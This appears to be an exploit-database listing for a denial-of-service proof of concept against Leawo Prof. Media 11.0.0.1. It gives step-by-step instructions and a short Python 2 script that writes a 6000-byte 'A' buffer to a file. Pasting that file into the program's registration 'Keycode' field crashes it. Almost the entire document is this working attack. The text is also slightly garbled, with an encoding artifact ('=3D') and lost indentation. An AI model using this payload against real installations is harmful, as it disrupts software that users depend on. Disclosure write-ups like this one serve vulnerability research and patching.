Leawo Prof. Media version 11.0.0.1 suffers from a denial of service vulnerability.
2372bdeda3c60eb93e2b722ecd563fe9# Exploit Title: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)
# Date: 25.07.2021
# Vendor Homepage:https://www.leawo.org
# Software Link: https://www.leawo.org/downloads/total-media-converter-ultimate.html
# Exploit Author: Achilles
# Tested Version: 11.0.0.1
# Tested on: Windows 7 x64
# 1.- Run python code :
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Leawo Prof. Media
# 4.- Click Activation Center
# 5.- Paste the content of EVIL.txt into the Field: 'Keycode'
# 6.- Click 'Register' and you will see a crash.
#!/usr/bin/env python
buffer =3D "\x41" * 6000
try:
f = open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"